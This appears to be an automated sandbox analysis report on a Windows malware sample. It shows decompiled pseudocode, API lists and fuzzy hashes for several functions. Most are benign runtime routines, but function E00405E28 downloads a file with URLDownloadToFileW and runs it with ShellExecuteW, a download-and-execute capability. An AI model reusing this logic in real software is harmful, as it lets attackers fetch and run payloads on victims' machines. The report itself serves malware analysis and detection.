                                                                                                0x00407f99
                                                                                                0x00407fa1
                                                                                                0x00407fa9
                                                                                                0x00407fae
                                                                                                0x00000000
                                                                                                0x00407fae
                                                                                                0x00407d2d
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407C9A
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00407D12
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00407D3B
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00407D52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                                • String ID:
                                                                                                • API String ID: 3260228402-0
                                                                                                • Opcode ID: 45028a94613e0432cb9e7bb02ccb75b2a04c466909aef4cebea62118aa8bf19e
                                                                                                • Instruction ID: a8c85bca6a8ed267b4c155fb5eebf7722f365f085f43aaf3af661ff30ad9601a
                                                                                                • Opcode Fuzzy Hash: 45028a94613e0432cb9e7bb02ccb75b2a04c466909aef4cebea62118aa8bf19e
                                                                                                • Instruction Fuzzy Hash: 50915E319001199BCB15EBA1CD919EEB379BF50308F10417FE502B71E1EF38AA49CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044BAE0, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E0044BAE0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x46c00c; // 0x4cc22724
				_v8 = _t39 ^ _t109;
				_t89 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E00442F68(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00442F68(_t89, __ecx, __edx);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x45b014; // 0x17
					E0044BA83(0, 0x45af00, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					E0044B420(_t92, _t99,  &_v20);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						E0044B506(_t92, _t99,  &_v20);
					} else {
						E0044B46B(_t92, _t99,  &_v20);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x45aefc; // 0x41
						_t77 = E0044BA83(_t99, 0x45abf0, _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E0044B90C(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E0044389C(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E00430A5B(_v8 ^ _t109);
								}
								_t33 =  &(_t89[0x90]); // 0x43f6c1
								E0044389C(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t36 =  &(_t89[0x40]); // 0x43f621
								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								_t38 =  &(_t89[0x80]); // 0x43f6a1
								E0043CE14(_t38, _t108, _t38, 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E0044B506(_t92, _t99,  &_v20);
						} else {
							E0044B46B(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                                                                                                0x0044bae8
                                                                                                0x0044baef
                                                                                                0x0044baf6
                                                                                                0x0044bafa
                                                                                                0x0044bafe
                                                                                                0x0044bb0c
                                                                                                0x0044bb11
                                                                                                0x0044bb12
                                                                                                0x0044bb13
                                                                                                0x0044bb14
                                                                                                0x0044bb1c
                                                                                                0x0044bb1e
                                                                                                0x0044bb24
                                                                                                0x0044bb2a
                                                                                                0x0044bb2d
                                                                                                0x0044bb2f
                                                                                                0x0044bb32
                                                                                                0x0044bb36
                                                                                                0x0044bb3d
                                                                                                0x0044bb4a
                                                                                                0x0044bb4f
                                                                                                0x0044bb52
                                                                                                0x0044bb55
                                                                                                0x0044bb55
                                                                                                0x0044bb57
                                                                                                0x0044bb5a
                                                                                                0x0044bb5e
                                                                                                0x0044bbce
                                                                                                0x0044bbd0
                                                                                                0x0044bbd2
                                                                                                0x0044bbe5
                                                                                                0x0044bbe5
                                                                                                0x0044bbec
                                                                                                0x0044bbf2
                                                                                                0x0044bbf5
                                                                                                0x00000000
                                                                                                0x0044bbf5
                                                                                                0x0044bbd4
                                                                                                0x0044bbd7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bbdd
                                                                                                0x0044bbe2
                                                                                                0x00000000
                                                                                                0x0044bb65
                                                                                                0x0044bb65
                                                                                                0x0044bb69
                                                                                                0x0044bb7f
                                                                                                0x0044bb70
                                                                                                0x0044bb74
                                                                                                0x0044bb74
                                                                                                0x0044bb88
                                                                                                0x0044bb89
                                                                                                0x0044bc13
                                                                                                0x0044bc13
                                                                                                0x00000000
                                                                                                0x0044bb8f
                                                                                                0x0044bb8f
                                                                                                0x0044bb9e
                                                                                                0x0044bba3
                                                                                                0x0044bba8
                                                                                                0x0044bbf8
                                                                                                0x0044bbf8
                                                                                                0x0044bbf8
                                                                                                0x0044bbfa
                                                                                                0x0044bbfe
                                                                                                0x0044bc15
                                                                                                0x0044bc21
                                                                                                0x0044bc2b
                                                                                                0x0044bc2e
                                                                                                0x0044bc2f
                                                                                                0x0044bc31
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bc33
                                                                                                0x0044bc39
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bc3b
                                                                                                0x0044bc41
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bc47
                                                                                                0x0044bc4d
                                                                                                0x0044bc4f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bc56
                                                                                                0x0044bc5c
                                                                                                0x0044bc5e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bc60
                                                                                                0x0044bc63
                                                                                                0x0044bc65
                                                                                                0x0044bc67
                                                                                                0x0044bc67
                                                                                                0x0044bc78
                                                                                                0x0044bc7d
                                                                                                0x0044bc7f
                                                                                                0x0044bcdf
                                                                                                0x0044bc02
                                                                                                0x0044bc12
                                                                                                0x0044bc12
                                                                                                0x0044bc84
                                                                                                0x0044bc8e
                                                                                                0x0044bc9e
                                                                                                0x0044bca4
                                                                                                0x0044bca6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bcae
                                                                                                0x0044bcbd
                                                                                                0x0044bcc3
                                                                                                0x0044bcc5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044bccf
                                                                                                0x0044bcd7
                                                                                                0x00000000
                                                                                                0x0044bcdc
                                                                                                0x0044bc00
                                                                                                0x00000000
                                                                                                0x0044bc00
                                                                                                0x0044bbaa
                                                                                                0x0044bbac
                                                                                                0x0044bbb0
                                                                                                0x0044bbc6
                                                                                                0x0044bbb7
                                                                                                0x0044bbbb
                                                                                                0x0044bbbb
                                                                                                0x0044bbcb
                                                                                                0x00000000
                                                                                                0x0044bbcb
                                                                                                0x0044bb89

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442FC7
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FD4
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044BBEC
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0044BC47
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044BC56
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,0043F5A1,00000040,?,0043F6C1,00000055,00000000,?,?,00000055,00000000), ref: 0044BC9E
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,0043F621,00000040), ref: 0044BCBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: b20f1f30a73e5990f55684d0b63626837e244aef67d160553728402ef271492c
                                                                                                • Instruction ID: 68f7521ddd08404ca6bc68bed0c56ecca10238e2756af2720d9b3fccd52ec889
                                                                                                • Opcode Fuzzy Hash: b20f1f30a73e5990f55684d0b63626837e244aef67d160553728402ef271492c
                                                                                                • Instruction Fuzzy Hash: E1519571A00609ABFB10DFA5CC85ABF73B8EF04705F14406BF914EB251DB78E9408BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004440B8, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E004440B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E00443B22();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E00443B80( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00437736();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46c00c; // 0x4cc22724
					_v56 = _t38 ^ _t106;
					 *0x46c334 =  *0x46c334 | 0xffffffff;
					 *0x46c328 =  *0x46c328 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x46d748 = 0;
					_t42 = E00437B05(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E00440C6C(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E00437B05(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E004414D5(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E004414D5();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E004440B8(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E00443EE3(_t77, _t89, _t100, __eflags);
						}
					}
					E004414D5(_t100);
					__eflags = _v12 ^ _t106;
					return E00430A5B(_v12 ^ _t106);
				} else {
					_t54 = E00443B28( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E00443B54( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E004414D5( *0x46d740);
							 *0x46d740 = 0;
							 *_t107 = 0x46d750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46d750 * 0x3c;
								_t87 =  *0x46d7a4; // 0x0
								_push(__edi);
								 *0x46d748 = 1;
								_v8 = _t85;
								_t116 =  *0x46d796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x46d7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46d7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E0044083B(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46d754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46d7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00443B1C()) = _v8;
							 *(E00443B10()) = _v12;
							_t61 = E00443B16();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}


































                                                                                                0x004440b8
                                                                                                0x004440c7
                                                                                                0x004440ce
                                                                                                0x004440d2
                                                                                                0x004440d5
                                                                                                0x004440d8
                                                                                                0x004440dd
                                                                                                0x004440e0
                                                                                                0x00444208
                                                                                                0x00444208
                                                                                                0x00444209
                                                                                                0x0044420a
                                                                                                0x0044420b
                                                                                                0x0044420c
                                                                                                0x0044420d
                                                                                                0x00444212
                                                                                                0x00444216
                                                                                                0x0044421e
                                                                                                0x00444225
                                                                                                0x00444228
                                                                                                0x00444235
                                                                                                0x0044423c
                                                                                                0x0044423d
                                                                                                0x0044423f
                                                                                                0x00444244
                                                                                                0x00444253
                                                                                                0x0044425a
                                                                                                0x00444262
                                                                                                0x00444264
                                                                                                0x0044426e
                                                                                                0x00444271
                                                                                                0x0044427e
                                                                                                0x00444281
                                                                                                0x00444283
                                                                                                0x0044429c
                                                                                                0x004442a4
                                                                                                0x004442a6
                                                                                                0x004442ac
                                                                                                0x004442b1
                                                                                                0x004442a8
                                                                                                0x004442a8
                                                                                                0x00000000
                                                                                                0x004442a8
                                                                                                0x00444285
                                                                                                0x00444285
                                                                                                0x00444286
                                                                                                0x00444286
                                                                                                0x00444286
                                                                                                0x004442b3
                                                                                                0x00444266
                                                                                                0x00444266
                                                                                                0x00444266
                                                                                                0x004442c0
                                                                                                0x004442c2
                                                                                                0x004442c4
                                                                                                0x004442c6
                                                                                                0x004442d6
                                                                                                0x004442d6
                                                                                                0x004442c8
                                                                                                0x004442c8
                                                                                                0x004442cb
                                                                                                0x00000000
                                                                                                0x004442cd
                                                                                                0x004442cd
                                                                                                0x004442ce
                                                                                                0x004442d3
                                                                                                0x004442cb
                                                                                                0x004442dc
                                                                                                0x004442e7
                                                                                                0x004442f2
                                                                                                0x004440e6
                                                                                                0x004440ea
                                                                                                0x004440ef
                                                                                                0x004440f2
                                                                                                0x00000000
                                                                                                0x004440f8
                                                                                                0x004440fc
                                                                                                0x00444101
                                                                                                0x00444104
                                                                                                0x00000000
                                                                                                0x0044410a
                                                                                                0x00444110
                                                                                                0x00444115
                                                                                                0x0044411b
                                                                                                0x0044412b
                                                                                                0x00444131
                                                                                                0x00444138
                                                                                                0x0044413e
                                                                                                0x00444142
                                                                                                0x00444148
                                                                                                0x0044414b
                                                                                                0x00444152
                                                                                                0x00444159
                                                                                                0x00444159
                                                                                                0x0044415c
                                                                                                0x00444163
                                                                                                0x0044417b
                                                                                                0x0044417b
                                                                                                0x0044417e
                                                                                                0x00444165
                                                                                                0x00444165
                                                                                                0x0044416c
                                                                                                0x00000000
                                                                                                0x0044416e
                                                                                                0x00444170
                                                                                                0x00444176
                                                                                                0x00444176
                                                                                                0x0044416c
                                                                                                0x00444186
                                                                                                0x004441a2
                                                                                                0x004441b2
                                                                                                0x004441a9
                                                                                                0x004441ab
                                                                                                0x004441ab
                                                                                                0x004441d0
                                                                                                0x004441e2
                                                                                                0x004441d7
                                                                                                0x004441da
                                                                                                0x004441da
                                                                                                0x004441d0
                                                                                                0x004441ec
                                                                                                0x004441f6
                                                                                                0x004441fb
                                                                                                0x00444200
                                                                                                0x00444207
                                                                                                0x00444207
                                                                                                0x00444104
                                                                                                0x004440f2

                                                                                                APIs
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1AC), ref: 00444122
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 0044419A
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004441C7
                                                                                                • _free.LIBCMT ref: 00444110
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 004442DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 1286116820-0
                                                                                                • Opcode ID: 02ae79e005892dcc5bcdea75217d5923d56ab98353f4b2a4e9de9ba00b4f3427
                                                                                                • Instruction ID: 56df1fdb0d2c8a7936ce496f4277ed661e93f241b12f8068f7736a0ffc027213
                                                                                                • Opcode Fuzzy Hash: 02ae79e005892dcc5bcdea75217d5923d56ab98353f4b2a4e9de9ba00b4f3427
                                                                                                • Instruction Fuzzy Hash: 0A512B71D00204ABEB10EF65DC85AAAB7BCEF90355B10026FF450D7291EB789E41C75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405E28, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226filenetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E00405E28(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t88;
				void* _t106;
				void* _t120;
				void* _t144;
				void* _t148;
				signed int _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t166;
				void* _t167;

				_t167 = __eflags;
				_t140 = __edx;
				_t33 = E00401F87( &_a8);
				_push(0xffffffff);
				_t88 = 4;
				_push(_t88);
				_push( &_v28);
				E00404287( &_a8);
				_t158 = (_t155 & 0xfffffff8) - 0x2c;
				E004020DE(_t88, _t158, __edx, _t167, 0x46e250);
				_t159 = _t158 - 0x18;
				E004020DE(_t88, _t159, __edx, _t167,  &_v44);
				E00417E68( &_v84, _t140);
				_t160 = _t159 + 0x30;
				_t148 =  *_t33 - _t88;
				if(_t148 == 0) {
					_t144 = 0;
					E00401E3B( &_v64, _t140, __eflags, 0);
					_t141 = "F";
					__eflags = E00405C1B("F");
					if(__eflags == 0) {
						E00401E3B( &_v68, "F", __eflags, 0);
						_t140 = "M";
						__eflags = E00405C1B("M");
						if(__eflags == 0) {
							L23:
							E00401E66( &_v64, _t140);
							E00401FB9();
							E00401FB9();
							return 0;
						}
						_v68 = 0;
						_t50 = E00401F87(E00401E3B( &_v64, "M", __eflags, _t88));
						_t140 =  &_v76;
						__eflags = E00417B01(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t106 = _t160 - 0x18;
							_push("2");
							L22:
							E00402076(_t88, _t106);
							_push(0xb3);
							E00404BB7(_t88, _a4, _t140, __eflags);
							goto L23;
						}
						_t140 = _v72;
						_t54 = E00414D29(0x46daf8);
						L00437769(_v72);
						_t162 = _t160 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t106 = _t162;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = E00401F87(E00401E3B( &_v68, "F", __eflags, 2));
					_t59 = E00401F87(E00401E3B( &_v68, _t141, __eflags, 3));
					_t140 =  *_t57;
					E00418A4B( &_v60,  *_t57, _t59);
					_t63 = E00401F87(E00401E3B( &_v72,  *_t57, __eflags, _t88));
					__imp__URLDownloadToFileW(0, _t63, E00401EDD( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(E00401F87(E00401E3B( &_v84, _t140, _t171, 1)))) == 0) {
							_t120 = _t160 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t144, L"open", E00401EDD( &_v72), _t144, _t144, 1);
							_t120 = _t160 - 0x18;
							_t173 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00402076(_t88, _t120);
						_push(0xb3);
						E00404BB7(_t88, _a4, _t140, _t173);
						E00401EE2();
						goto L23;
					}
					L14:
					_t120 = _t160 - 0x18;
					_push("2");
					goto L17;
				}
				_t169 = _t148 != 1;
				if(_t148 != 1) {
					goto L23;
				}
				_t144 = 0;
				E00401E3B( &_v64, _t140, _t169, 0);
				_t142 = "F";
				_t72 = E00405C1B("F");
				_t170 = _t72;
				if(_t72 == 0) {
					E00401E3B( &_v68, "F", __eflags, 0);
					_t140 = "M";
					__eflags = E00405C1B("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t140 = E00401F87(E00401E3B( &_v64, "M", __eflags, _t88));
						_t77 = E00414D29(0x46daf8);
						_t162 = _t160 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = E00401F87(E00401E3B( &_v68, "F", _t170, 2));
				_t81 = E00401F87(E00401E3B( &_v68, _t142, _t170, 3));
				_t140 =  *_t79;
				E00418A4B( &_v60,  *_t79, _t81);
				_t83 = E00401EDD( &_v60);
				_t84 = E00401E3B( &_v72,  *_t79, _t170, _t88);
				_t166 = _t160 - 0x18;
				E004020DE(_t88, _t166, _t140, _t170, _t84);
				_t86 = E0041843E(_t83);
				_t160 = _t166 + 0x18;
				_t171 = _t86 - 1;
				if(_t86 != 1) {
					goto L14;
				}
				goto L4;
			}








































                                                                                                0x00405e28
                                                                                                0x00405e28
                                                                                                0x00405e37
                                                                                                0x00405e3c
                                                                                                0x00405e40
                                                                                                0x00405e46
                                                                                                0x00405e4b
                                                                                                0x00405e4c
                                                                                                0x00405e51
                                                                                                0x00405e5b
                                                                                                0x00405e60
                                                                                                0x00405e6a
                                                                                                0x00405e73
                                                                                                0x00405e78
                                                                                                0x00405e7b
                                                                                                0x00405e7d
                                                                                                0x00405fb2
                                                                                                0x00405fb9
                                                                                                0x00405fbe
                                                                                                0x00405fce
                                                                                                0x00405fd0
                                                                                                0x00406070
                                                                                                0x00406075
                                                                                                0x00406081
                                                                                                0x00406083
                                                                                                0x004060f1
                                                                                                0x004060f5
                                                                                                0x004060fe
                                                                                                0x00406106
                                                                                                0x00406113
                                                                                                0x00406113
                                                                                                0x00406089
                                                                                                0x0040609a
                                                                                                0x0040609f
                                                                                                0x004060ab
                                                                                                0x004060ad
                                                                                                0x004060d8
                                                                                                0x004060da
                                                                                                0x004060df
                                                                                                0x004060df
                                                                                                0x004060e7
                                                                                                0x004060ec
                                                                                                0x00000000
                                                                                                0x004060ec
                                                                                                0x004060af
                                                                                                0x004060b8
                                                                                                0x004060c4
                                                                                                0x004060ca
                                                                                                0x004060cd
                                                                                                0x00405f9a
                                                                                                0x00405f9a
                                                                                                0x00405f9c
                                                                                                0x00405fa8
                                                                                                0x00405f9e
                                                                                                0x00405f9e
                                                                                                0x00405f9e
                                                                                                0x00000000
                                                                                                0x00405f9c
                                                                                                0x00405fdf
                                                                                                0x00405ff3
                                                                                                0x00405ff8
                                                                                                0x00405fff
                                                                                                0x0040601d
                                                                                                0x00406024
                                                                                                0x0040602a
                                                                                                0x0040602c
                                                                                                0x00405f11
                                                                                                0x00405f26
                                                                                                0x00406048
                                                                                                0x0040604a
                                                                                                0x00405f2c
                                                                                                0x00405f40
                                                                                                0x00405f49
                                                                                                0x00405f4b
                                                                                                0x00405f4e
                                                                                                0x0040603e
                                                                                                0x00405f54
                                                                                                0x00405f54
                                                                                                0x00405f54
                                                                                                0x00405f4e
                                                                                                0x0040604f
                                                                                                0x0040604f
                                                                                                0x00406057
                                                                                                0x0040605c
                                                                                                0x00406065
                                                                                                0x00000000
                                                                                                0x00406065
                                                                                                0x00406032
                                                                                                0x00406035
                                                                                                0x00406037
                                                                                                0x00000000
                                                                                                0x00406037
                                                                                                0x00405e83
                                                                                                0x00405e86
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405e8c
                                                                                                0x00405e93
                                                                                                0x00405e98
                                                                                                0x00405e9f
                                                                                                0x00405ea8
                                                                                                0x00405eaa
                                                                                                0x00405f5f
                                                                                                0x00405f64
                                                                                                0x00405f70
                                                                                                0x00405f72
                                                                                                0x00000000
                                                                                                0x00405f78
                                                                                                0x00405f89
                                                                                                0x00405f90
                                                                                                0x00405f95
                                                                                                0x00405f98
                                                                                                0x00000000
                                                                                                0x00405f98
                                                                                                0x00405f72
                                                                                                0x00405eb9
                                                                                                0x00405ecd
                                                                                                0x00405ed2
